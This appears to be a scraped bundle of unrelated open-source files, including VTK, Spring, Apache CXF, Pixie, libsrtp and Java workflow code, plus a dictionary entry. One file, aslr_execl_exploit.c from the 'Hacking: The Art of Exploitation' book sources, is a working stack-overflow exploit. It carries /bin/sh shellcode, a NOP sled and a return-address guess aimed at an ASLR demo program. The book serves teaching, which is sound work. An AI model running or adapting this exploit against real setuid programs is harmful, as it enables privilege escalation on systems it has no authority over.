One or the other will be used vtkSmartPointer<vtkTubeFilter> TubeFilter = vtkSmartPointer<vtkTubeFilter>::New(); TubeFilter->SetInputConnection(PolyDataRead->GetOutputPort()); TubeFilter->SetNumberOfSides(8); TubeFilter->SetRadius(0.5); TubeFilter->SetRadiusFactor(10000); vtkSmartPointer<vtkRibbonFilter> RibbonFilter = vtkSmartPointer<vtkRibbonFilter>::New(); RibbonFilter->SetInputConnection(PolyDataRead->GetOutputPort()); RibbonFilter->VaryWidthOn(); RibbonFilter->SetWidthFactor(5); RibbonFilter->SetDefaultNormal(0, 1, 0); RibbonFilter->UseDefaultNormalOn(); vtkSmartPointer<vtkLinearExtrusionFilter> Extrude = vtkSmartPointer<vtkLinearExtrusionFilter>::New(); Extrude->SetInputConnection(RibbonFilter->GetOutputPort()); Extrude->SetVector(0, 1, 0); Extrude->SetExtrusionType(1); Extrude->SetScaleFactor(0.7); vtkSmartPointer<vtkTransform> Transform = vtkSmartPointer<vtkTransform>::New(); Transform->Translate(0, 0, zPosition); Transform->Scale(0.15, 1, 1); vtkSmartPointer<vtkTransformPolyDataFilter> TransformFilter = vtkSmartPointer<vtkTransformPolyDataFilter>::New(); TransformFilter->SetTransform(Transform); // Select tubes or ribbons if (useTubes) { TransformFilter->SetInputConnection(TubeFilter->GetOutputPort()); } else { TransformFilter->SetInputConnection(Extrude->GetOutputPort()); } for (size_t r = 0; r < renderers.size(); ++r) { vtkSmartPointer<vtkPolyDataMapper> LabelMapper = vtkSmartPointer<vtkPolyDataMapper>::New(); LabelMapper->SetInputConnection(TextSrc->GetOutputPort()); vtkSmartPointer<vtkFollower> LabelActor = vtkSmartPointer<vtkFollower>::New(); LabelActor->SetMapper(LabelMapper); LabelActor->SetPosition(x, y, z); LabelActor->SetScale(2, 2, 2); LabelActor->SetOrigin(TextSrc->GetOutput()->GetCenter()); // increment zPosition zPosition += 8.0; vtkSmartPointer<vtkPolyDataMapper> StockMapper = vtkSmartPointer<vtkPolyDataMapper>::New(); StockMapper->SetInputConnection(TransformFilter->GetOutputPort()); StockMapper->SetScalarRange(0, 8000); vtkSmartPointer<vtkActor> StockActor = vtkSmartPointer<vtkActor>::New(); StockActor->SetMapper(StockMapper); renderers[r]->AddActor(StockActor); renderers[r]->AddActor(LabelActor); LabelActor->SetCamera(renderers[r]->GetActiveCamera()); } return; } }
2,472
640
<filename>books_and_notes/professional_courses/Security/sources/extra_books/Hacking:The Art of Exploitation (Second Edition)源代码/booksrc/aslr_execl_exploit.c<gh_stars>100-1000
#include <stdio.h>
#include <stdlib.h> // for atoi()
#include <unistd.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // standard shellcode

int main(int argc, char *argv[]) {
   unsigned int i, ret, offset;
   char buffer[1000];

   printf("i is at %p\n", &i);

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset + 200; // set return address

   printf("ret addr is %p\n", ret);

   for(i=0; i < 90; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer+84, 0x90, 900); // build NOP sled
   memcpy(buffer+900, shellcode, sizeof(shellcode));

   execl("./aslr_demo", "aslr_demo", buffer, NULL);
}
456
1,656
<gh_stars>1000+ /* * Copyright 2018-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.cloud.sleuth.instrument.session; import java.util.Map; import org.springframework.cloud.sleuth.Tracer; import org.springframework.cloud.sleuth.docs.AssertingSpan; import org.springframework.session.FindByIndexNameSessionRepository; class TraceFindByIndexNameSessionRepository extends TraceSessionRepository implements FindByIndexNameSessionRepository { private final FindByIndexNameSessionRepository delegate; TraceFindByIndexNameSessionRepository(Tracer tracer, FindByIndexNameSessionRepository delegate) { super(tracer, delegate); this.delegate = delegate; } @Override public Map findByPrincipalName(String principalName) { AssertingSpan span = newSessionFindSpan(); try (Tracer.SpanInScope ws = this.tracer.withSpan(span.start())) { return this.delegate.findByPrincipalName(principalName); } finally { span.end(); } } private AssertingSpan newSessionFindSpan() { return AssertingSpan.of(SleuthSessionSpan.SESSION_FIND_SPAN, this.tracer.nextSpan()) .name(SleuthSessionSpan.SESSION_FIND_SPAN.getName()); } @Override public Map findByIndexNameAndIndexValue(String indexName, String indexValue) { AssertingSpan span = newSessionFindSpan(); try (Tracer.SpanInScope ws = this.tracer.withSpan(span.start())) { span.tag(SleuthSessionSpan.Tags.INDEX_NAME, indexName); return this.delegate.findByIndexNameAndIndexValue(indexName, indexValue); } finally { span.end(); } } }
677
11,052
package us.codecraft.webmagic.example; import us.codecraft.webmagic.Site; import us.codecraft.webmagic.model.ConsolePageModelPipeline; import us.codecraft.webmagic.model.HasKey; import us.codecraft.webmagic.model.OOSpider; import us.codecraft.webmagic.model.annotation.ExtractBy; import us.codecraft.webmagic.model.annotation.ExtractByUrl; import java.util.List; /** * @author <EMAIL> <br> * @since 0.4.1 */ public class GithubRepoApi implements HasKey { @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.name", source = ExtractBy.Source.RawText) private String name; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$..owner.login", source = ExtractBy.Source.RawText) private String author; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.language",multi = true, source = ExtractBy.Source.RawText) private List<String> language; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.stargazers_count", source = ExtractBy.Source.RawText) private int star; @ExtractBy(type = ExtractBy.Type.JsonPath, value = "$.forks_count", source = ExtractBy.Source.RawText) private int fork; @ExtractByUrl private String url; public static void main(String[] args) { OOSpider.create(Site.me().setSleepTime(100) , new ConsolePageModelPipeline(), GithubRepoApi.class) .addUrl("https://api.github.com/repos/code4craft/webmagic").run(); } @Override public String key() { return author + ":" + name; } public String getName() { return name; } public String getAuthor() { return author; } public List<String> getLanguage() { return language; } public String getUrl() { return url; } public int getStar() { return star; } public int getFork() { return fork; } }
737
839
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.cxf.tools.common.toolspec;

import java.io.InputStream;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.util.logging.Level;
import java.util.logging.Logger;

import org.apache.cxf.common.i18n.Message;
import org.apache.cxf.common.logging.LogUtils;
import org.apache.cxf.tools.common.ToolContext;
import org.apache.cxf.tools.common.ToolException;

public final class ToolRunner {
    private ToolRunner() {
        // utility class - never constructed
    }

    public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream,
                               boolean validate, String[] args) throws Exception {
        runTool(clz, toolspecStream, validate, args, true);
    }

    public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream,
                               boolean validate, String[] args, OutputStream os) throws Exception {
        runTool(clz, toolspecStream, validate, args, true, null, os);
    }

    public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream,
                               boolean validate, String[] args, ToolContext context) throws Exception {
        runTool(clz, toolspecStream, validate, args, true, context, null);
    }

    public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream,
                               boolean validate, String[] args, boolean exitOnFinish) throws Exception {
        // pass the caller's exitOnFinish flag through instead of hard-coding "true"
        runTool(clz, toolspecStream, validate, args, exitOnFinish, null, null);
    }

    public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream,
                               boolean validate, String[] args, boolean exitOnFinish,
                               ToolContext context) throws Exception {
        runTool(clz, toolspecStream, validate, args, exitOnFinish, context, null);
    }

    public static void runTool(Class<? extends ToolContainer> clz, InputStream toolspecStream,
                               boolean validate, String[] args, boolean exitOnFinish,
                               ToolContext context, OutputStream os) throws Exception {
        System.setProperty("org.apache.cxf.JDKBugHacks.defaultUsesCaches", "true");

        final ToolContainer container;
        try {
            Constructor<? extends ToolContainer> cons = clz.getConstructor(
                new Class[] {
                    ToolSpec.class
                });
            container = cons.newInstance(
                new Object[] {
                    new ToolSpec(toolspecStream, validate)
                });
        } catch (Exception ex) {
            Logger log = LogUtils.getL7dLogger(ToolRunner.class);
            Message message = new Message("CLZ_CANNOT_BE_CONSTRUCTED", log, clz.getName());
            log.log(Level.SEVERE, message.toString());
            throw new ToolException(message, ex);
        }

        container.setArguments(args);
        if (os != null) {
            container.setErrOutputStream(os);
            container.setOutOutputStream(os);
        }
        container.setContext(context);
        container.execute(exitOnFinish);
    }

}
2,059
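ToolRunner above is a thin reflective launcher: it instantiates the given ToolContainer subclass with a ToolSpec built from the toolspec stream, then hands it the arguments and context. A hedged sketch of a call site follows; the concrete ToolContainer implementation and the toolspec stream are assumed to be supplied by the caller, and only the runTool overload shown above is used.

import java.io.InputStream;

import org.apache.cxf.tools.common.ToolContext;
import org.apache.cxf.tools.common.toolspec.ToolContainer;
import org.apache.cxf.tools.common.toolspec.ToolRunner;

public class ToolRunnerSketch {

    // Runs the given container class against a toolspec with validation enabled.
    // Both arguments are assumed to be provided by the caller, e.g. a concrete
    // ToolContainer subclass and its toolspec XML loaded from the classpath.
    public static void run(Class<? extends ToolContainer> containerClass,
                           InputStream toolspecStream,
                           String[] args) throws Exception {
        ToolRunner.runTool(containerClass, toolspecStream, true, args, new ToolContext());
    }
}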
1,821
/* * Copyright 2018- The Pixie Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ #include "src/vizier/services/agent/manager/exec.h" #include <memory> #include <string> #include <utility> #include <jwt/jwt.hpp> #include "src/common/base/base.h" #include "src/common/event/task.h" #include "src/common/perf/perf.h" #include "src/vizier/services/agent/manager/manager.h" namespace px { namespace vizier { namespace agent { using ::px::event::AsyncTask; class ExecuteQueryMessageHandler::ExecuteQueryTask : public AsyncTask { public: ExecuteQueryTask(ExecuteQueryMessageHandler* h, carnot::Carnot* carnot, std::unique_ptr<messages::VizierMessage> msg) : parent_(h), carnot_(carnot), msg_(std::move(msg)), req_(msg_->execute_query_request()), query_id_(ParseUUID(req_.query_id()).ConsumeValueOrDie()) {} sole::uuid query_id() { return query_id_; } void Work() override { LOG(INFO) << absl::Substitute("Executing query: id=$0", query_id_.str()); VLOG(1) << absl::Substitute("Query Plan: $0=$1", query_id_.str(), req_.plan().DebugString()); auto s = carnot_->ExecutePlan(req_.plan(), query_id_, req_.analyze()); if (!s.ok()) { if (s.code() == px::statuspb::Code::CANCELLED) { LOG(WARNING) << absl::Substitute("Cancelled query: $0", query_id_.str()); } else { LOG(ERROR) << absl::Substitute("Query $0 failed, reason: $1, plan: $2", query_id_.str(), s.ToString(), req_.plan().DebugString()); } } else { LOG(INFO) << absl::Substitute("Completed query: id=$0", query_id_.str()); } } void Done() override { parent_->HandleQueryExecutionComplete(query_id_); } private: ExecuteQueryMessageHandler* parent_; carnot::Carnot* carnot_; std::unique_ptr<messages::VizierMessage> msg_; const messages::ExecuteQueryRequest& req_; sole::uuid query_id_; }; ExecuteQueryMessageHandler::ExecuteQueryMessageHandler(px::event::Dispatcher* dispatcher, Info* agent_info, Manager::VizierNATSConnector* nats_conn, carnot::Carnot* carnot) : MessageHandler(dispatcher, agent_info, nats_conn), carnot_(carnot) {} Status ExecuteQueryMessageHandler::HandleMessage(std::unique_ptr<messages::VizierMessage> msg) { // Create a task and run it on the threadpool. auto task = std::make_unique<ExecuteQueryTask>(this, carnot_, std::move(msg)); auto query_id = task->query_id(); auto runnable = dispatcher()->CreateAsyncTask(std::move(task)); auto runnable_ptr = runnable.get(); LOG(INFO) << "Queries in flight: " << running_queries_.size(); running_queries_[query_id] = std::move(runnable); runnable_ptr->Run(); return Status::OK(); } void ExecuteQueryMessageHandler::HandleQueryExecutionComplete(sole::uuid query_id) { // Upon completion of the query, we makr the runnable task for deletion. auto node = running_queries_.extract(query_id); if (node.empty()) { LOG(ERROR) << "Attempting to delete non-existent query: " << query_id.str(); return; } dispatcher()->DeferredDelete(std::move(node.mapped())); } } // namespace agent } // namespace vizier } // namespace px
1,516
335
<filename>R/Ride_verb.json { "word": "Ride", "definitions": [ "Sit on and control the movement of (an animal, typically a horse)", "Travel on a horse or other animal.", "Sit on and control (a bicycle or motorcycle)", "Travel in or on (a vehicle) as a passenger.", "Travel in (a vehicle or lift)", "Go through or over (an area) on a horse, bicycle, etc.", "Compete in (a race) on a horse, bicycle, or motorcycle.", "(of a vehicle, animal, racetrack, etc.) be of a particular character for riding on or in.", "Transport (someone) in a vehicle.", "Transport (goods)", "Be carried or supported by (something moving with great momentum)", "Move so as to project or overlap.", "(of a vessel) sail or float.", "Be full of or dominated by.", "Yield to (a blow) so as to reduce its impact.", "Have sexual intercourse with.", "Annoy, pester, or tease." ], "parts-of-speech": "Verb" }
394
10,225
<reponame>CraigMcDonaldCodes/quarkus<filename>independent-projects/arc/tests/src/test/java/io/quarkus/arc/test/interceptors/defaultmethod/DefaultMethodBean.java package io.quarkus.arc.test.interceptors.defaultmethod; import javax.enterprise.context.ApplicationScoped; @ApplicationScoped @ABinding public class DefaultMethodBean implements DefaultMethodInterface { @NextBinding public String hello() { return "hello"; } @Override public String ping() { return "pong"; } }
181
1,144
<gh_stars>1000+ package de.metas.handlingunits.storage; /* * #%L * de.metas.handlingunits.base * %% * Copyright (C) 2015 metas GmbH * %% * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as * published by the Free Software Foundation, either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program. If not, see * <http://www.gnu.org/licenses/gpl-2.0.html>. * #L% */ import java.math.BigDecimal; import org.compiere.model.I_C_UOM; import de.metas.product.ProductId; import de.metas.quantity.Quantity; /** * Generic Handling Unit Storage. * * Implementations of this interface can be at any level of a given HU (e.g. HU Level, HU Item level etc). * * @author tsa * */ public interface IGenericHUStorage { /** * * @return parent storage or null */ IGenericHUStorage getParentStorage(); /** * Add or removed given <code>qty</code> to storage. * * @param productId * @param qty the qty to add (or to remove, if negative) * @param uom qty's UOM */ void addQty(ProductId productId, BigDecimal qty, I_C_UOM uom); /** * @return storage qty for <code>product</code> in <code>uom</code> unit of measure */ BigDecimal getQty(ProductId productId, I_C_UOM uom); default Quantity getQuantity(ProductId productId, I_C_UOM uom) { return Quantity.of(getQty(productId, uom), uom); } /** * * @return true if storage is empty */ boolean isEmpty(); /** * * @param productId * @return true if storage is empty for given product */ boolean isEmpty(ProductId productId); /** * @return true if this is a virtual storage (i.e. a storage for a virtual HU, HU Item etc) */ boolean isVirtual(); }
694
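IGenericHUStorage above is a plain quantity-bookkeeping interface, so a small sketch of typical caller code may be useful; the storage, product id and UOM instances are assumed to come from the surrounding metasfresh code and are therefore passed in as parameters here.

import java.math.BigDecimal;

import org.compiere.model.I_C_UOM;

import de.metas.handlingunits.storage.IGenericHUStorage;
import de.metas.product.ProductId;
import de.metas.quantity.Quantity;

public class HUStorageSketch {

    // Adds one unit of the given product to the storage and reads the new quantity back.
    public static Quantity addOneAndRead(IGenericHUStorage storage, ProductId productId, I_C_UOM uom) {
        storage.addQty(productId, BigDecimal.ONE, uom); // positive qty adds, negative removes
        return storage.getQuantity(productId, uom);     // default method wrapping getQty(...)
    }
}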
18,396
<gh_stars>1000+ /* * err.c * * error status reporting functions * * <NAME> * Cisco Systems, Inc. */ /* * * Copyright(c) 2001-2017 Cisco Systems, Inc. * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimer in the documentation and/or other materials provided * with the distribution. * * Neither the name of the Cisco Systems, Inc. nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * */ #ifdef HAVE_CONFIG_H #include <config.h> #endif #include "err.h" #include "datatypes.h" #include <string.h> /* srtp_err_file is the FILE to which errors are reported */ static FILE *srtp_err_file = NULL; srtp_err_status_t srtp_err_reporting_init() { #ifdef ERR_REPORTING_STDOUT srtp_err_file = stdout; #elif defined(ERR_REPORTING_FILE) /* open file for error reporting */ srtp_err_file = fopen(ERR_REPORTING_FILE, "w"); if (srtp_err_file == NULL) { return srtp_err_status_init_fail; } #endif return srtp_err_status_ok; } static srtp_err_report_handler_func_t *srtp_err_report_handler = NULL; srtp_err_status_t srtp_install_err_report_handler( srtp_err_report_handler_func_t func) { srtp_err_report_handler = func; return srtp_err_status_ok; } void srtp_err_report(srtp_err_reporting_level_t level, const char *format, ...) { char msg[512]; va_list args; if (srtp_err_file != NULL) { va_start(args, format); vfprintf(srtp_err_file, format, args); va_end(args); } if (srtp_err_report_handler != NULL) { va_start(args, format); if (vsnprintf(msg, sizeof(msg), format, args) > 0) { /* strip trailing \n, callback should not have one */ size_t l = strlen(msg); if (l && msg[l - 1] == '\n') { msg[l - 1] = '\0'; } srtp_err_report_handler(level, msg); /* * NOTE, need to be carefull, there is a potential that * octet_string_set_to_zero() could * call srtp_err_report() in the future, leading to recursion */ octet_string_set_to_zero(msg, sizeof(msg)); } va_end(args); } }
1,346
323
/* * @Copyright (c) 2018 缪聪(<EMAIL>) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.mcg.plugin.generate; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.PrintStream; import java.util.HashMap; import java.util.LinkedHashMap; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.UUID; import java.util.concurrent.Callable; import java.util.concurrent.CancellationException; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.alibaba.fastjson.JSON; import com.mcg.common.Constants; import com.mcg.common.sysenum.LogOutTypeEnum; import com.mcg.common.sysenum.LogTypeEnum; import com.mcg.common.sysenum.MessageTypeEnum; import com.mcg.entity.flow.FlowBase; import com.mcg.entity.flow.end.FlowEnd; import com.mcg.entity.flow.loop.FlowLoop; import com.mcg.entity.flow.start.FlowStart; import com.mcg.entity.generate.ExecuteStruct; import com.mcg.entity.generate.Order; import com.mcg.entity.generate.RunResult; import com.mcg.entity.generate.RunStatus; import com.mcg.entity.message.FlowBody; import com.mcg.entity.message.Message; import com.mcg.entity.message.NotifyBody; import com.mcg.plugin.assist.ExceptionProcess; import com.mcg.plugin.build.McgDirector; import com.mcg.plugin.build.McgProduct; import com.mcg.plugin.websocket.MessagePlugin; import com.mcg.util.FlowInstancesUtils; import com.mcg.util.Tools; import com.mcg.util.ZipCompressor; public class FlowTask implements Callable<RunStatus> { private Logger logger = LoggerFactory.getLogger(FlowTask.class); private String mcgWebScoketCode; private String httpSessionId; private ExecuteStruct executeStruct; /* 是否是子流程 */ private Boolean subFlag; public FlowTask(){ } public FlowTask(String mcgWebScoketCode, String httpSessionId, ExecuteStruct executeStruct, Boolean subFlag) { this.mcgWebScoketCode = mcgWebScoketCode; this.httpSessionId = httpSessionId; this.executeStruct = executeStruct; this.subFlag = subFlag; } @Override public RunStatus call() throws Exception { try { McgDirector director = new McgDirector(); int orderNum = 1; if(executeStruct.getOrders() != null && executeStruct.getOrders().getOrder() != null && executeStruct.getOrders().getOrder().size() > 0) { for(int i=0; i<executeStruct.getOrders().getOrder().size(); i++) { if(executeStruct.getRunStatus().isInterrupt()) { break; } List<Order> orderLoopList = executeStruct.getOrders().getOrder().get(i); int loopIndex = 0; /* 循环的开关 */ boolean swicth = true; do { Order order = orderLoopList.get(loopIndex ++); Message message = MessagePlugin.getMessage(); message.getHeader().setMesType(MessageTypeEnum.FLOW); FlowBody flowBody = new FlowBody(); String flowInstanceId = Tools.genFlowInstanceId(httpSessionId, executeStruct.getFlowId()); flowBody.setFlowInstanceId(flowInstanceId); flowBody.setFlowId(executeStruct.getFlowId()); flowBody.setSubFlag(executeStruct.getSubFlag()); McgProduct mcgProduct = executeStruct.getDataMap().get(order.getElementId()); executeStruct.setOrderNum(orderNum); McgProduct mcgProductClone = 
(McgProduct)mcgProduct.clone(); RunResult result = director.getFlowMcgProduct(mcgProductClone).build(executeStruct); FlowBase flowBase = (FlowBase)mcgProductClone; flowBody.setLogOutType(LogOutTypeEnum.RESULT.getValue()); flowBody.setEleType(flowBase.getEletypeEnum().getValue()); flowBody.setEleTypeDesc(flowBase.getEletypeEnum().getName()); flowBody.setEleId(order.getElementId()); flowBody.setComment(LogOutTypeEnum.RESULT.getName()); if(mcgProduct instanceof FlowStart || mcgProduct instanceof FlowEnd) { flowBody.setOrderNum(orderNum); } if(mcgProduct instanceof FlowLoop) { swicth = executeStruct.getRunStatus().getLoopStatusMap().get(order.getElementId()).getSwicth(); } executeStruct.getRunResultMap().put(order.getElementId(), result); if(result == null) { flowBody.setContent(""); } else if(result.getSourceCode() != null && !"".equals(result.getSourceCode())) { flowBody.setContent(result.getSourceCode()); } else if(result.getJsonVar() != null && !"".equals(result.getJsonVar())) { flowBody.setContent(result.getJsonVar()); } else if(result.getJsonVar() == null && result.getSourceCode() == null) { flowBody.setContent(""); } else { flowBody.setContent("控件运行值异常"); } flowBody.setLogOutType(LogOutTypeEnum.RESULT.getValue()); flowBody.setLogType(LogTypeEnum.INFO.getValue()); flowBody.setLogTypeDesc(LogTypeEnum.INFO.getName()); message.setBody(flowBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, message); if(!"success".equals(executeStruct.getRunStatus().getCode()) ) { break; } // 当有流程实例中存在循环时,重置下标进行达到无限循环 if(orderLoopList.size() == loopIndex) { loopIndex = 0; } orderNum ++; } while (!executeStruct.getRunStatus().isInterrupt() && orderLoopList.size() > 1 && swicth); } Message messageComplete = MessagePlugin.getMessage(); messageComplete.getHeader().setMesType(MessageTypeEnum.NOTIFY); NotifyBody notifyBody = new NotifyBody(); if(executeStruct.getRunStatus().isInterrupt()) { notifyBody.setContent("【" + executeStruct.getTopology().getName() + "】流程中断完毕!"); } else { notifyBody.setContent("【" + executeStruct.getTopology().getName() + "】流程执行完毕!"); } notifyBody.setType(LogTypeEnum.SUCCESS.getValue()); messageComplete.setBody(notifyBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, messageComplete); RunStatus runStatus = executeStruct.getRunStatus(); //流程实例执行时有产生文件 if(!executeStruct.getRunStatus().isInterrupt()) { Message fileMessage = MessagePlugin.getMessage(); fileMessage.getHeader().setMesType(MessageTypeEnum.FLOW); FlowBody fileFlowBody = new FlowBody(); if(subFlag) { fileFlowBody.setEleType("subFinish"); } else { fileFlowBody.setEleType("finish"); } fileFlowBody.setEleTypeDesc(executeStruct.getTopology().getName()); String tempId = UUID.randomUUID().toString(); fileFlowBody.setEleId(tempId); fileFlowBody.setSubFlag(executeStruct.getSubFlag()); fileFlowBody.setComment("流程执行完毕"); runStatus.setExecuteId(tempId); if(runStatus.getAvailableFileMap().size() > 0) { Map<String, LinkedHashMap<String, String>> availableFileMap = new HashMap<>(); LinkedHashMap<String, String> genFilesMap = new LinkedHashMap<String, String>(); List<String> filePathList = new LinkedList<String>(); for(String key : runStatus.getAvailableFileMap().keySet()) { filePathList.add(runStatus.getAvailableFileMap().get(key)); } String zipPath = Constants.DATA_PATH + "/../file/" + System.currentTimeMillis(); String zipName = "全部生成文件.zip"; genFilesMap.put(executeStruct.getFlowId(), zipPath + File.separator + zipName); ZipCompressor zipCompressor = new ZipCompressor(zipPath, zipName); zipCompressor.compress(filePathList); 
genFilesMap.putAll(runStatus.getAvailableFileMap()); availableFileMap.put("availableFileMap", genFilesMap); fileFlowBody.setContent(JSON.toJSONString(availableFileMap)); } else { fileFlowBody.setContent("none"); } fileFlowBody.setLogType(LogTypeEnum.INFO.getValue()); fileFlowBody.setLogTypeDesc(LogTypeEnum.INFO.getName()); fileMessage.setBody(fileFlowBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, fileMessage); } else { Message fileMessage = MessagePlugin.getMessage(); fileMessage.getHeader().setMesType(MessageTypeEnum.FLOW); FlowBody fileFlowBody = new FlowBody(); fileFlowBody.setEleType("interrupt"); fileFlowBody.setEleTypeDesc(executeStruct.getTopology().getName()); String tempId = UUID.randomUUID().toString(); fileFlowBody.setEleId(tempId); fileFlowBody.setComment("流程中断完毕"); runStatus.setExecuteId(tempId); fileFlowBody.setContent("执行引擎收到中断信号,流程已停止执行!"); fileFlowBody.setLogType(LogTypeEnum.INFO.getValue()); fileFlowBody.setLogTypeDesc(LogTypeEnum.INFO.getName()); fileMessage.setBody(fileFlowBody); MessagePlugin.push(mcgWebScoketCode, httpSessionId, fileMessage); } String flowInstanceId = Tools.genFlowInstanceId(httpSessionId, executeStruct.getFlowId()); FlowInstancesUtils.executeStructMap.remove(flowInstanceId); } } catch (InterruptedException e) { executeStruct.getRunStatus().setInterrupt(true); logger.error("流程中断,抛出InterruptedException,异常信息:", e); } catch(CancellationException e) { executeStruct.getRunStatus().setInterrupt(true); logger.error("流程中断,抛出CancellationException,异常信息:", e); } catch (Exception e) { ByteArrayOutputStream baos = new ByteArrayOutputStream(); e.printStackTrace(new PrintStream(baos)); String exception = baos.toString(); logger.error("流程执行发生错误,异常信息:", e); ExceptionProcess.execute(mcgWebScoketCode, httpSessionId, executeStruct.getFlowId(), executeStruct.getDataMap().get(executeStruct.getRunStatus().getExecuteId()), exception); } return executeStruct.getRunStatus(); } public String getHttpSessionId() { return httpSessionId; } public ExecuteStruct getExecuteStruct() { return executeStruct; } public void setExecuteStruct(ExecuteStruct executeStruct) { this.executeStruct = executeStruct; } public Boolean getSubFlag() { return subFlag; } public void setSubFlag(Boolean subFlag) { this.subFlag = subFlag; } }
6,021
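FlowTask above is a Callable<RunStatus>, so the usual way to run it is through an executor and a Future. The sketch below shows that wiring; the websocket code, HTTP session id and ExecuteStruct are assumed to be prepared by the surrounding application, and the single-thread pool is only an illustration.

import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

import com.mcg.entity.generate.ExecuteStruct;
import com.mcg.entity.generate.RunStatus;
import com.mcg.plugin.generate.FlowTask;

public class FlowTaskSketch {

    // Submits a FlowTask (subFlag = false, i.e. a top-level flow) and blocks for its RunStatus.
    public static RunStatus runFlow(String mcgWebScoketCode, String httpSessionId,
                                    ExecuteStruct executeStruct) throws Exception {
        ExecutorService pool = Executors.newSingleThreadExecutor();
        try {
            Future<RunStatus> future =
                    pool.submit(new FlowTask(mcgWebScoketCode, httpSessionId, executeStruct, false));
            return future.get(); // waits until the flow finishes or is interrupted
        } finally {
            pool.shutdownNow(); // shutdownNow so a hanging flow thread can still be interrupted
        }
    }
}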
312
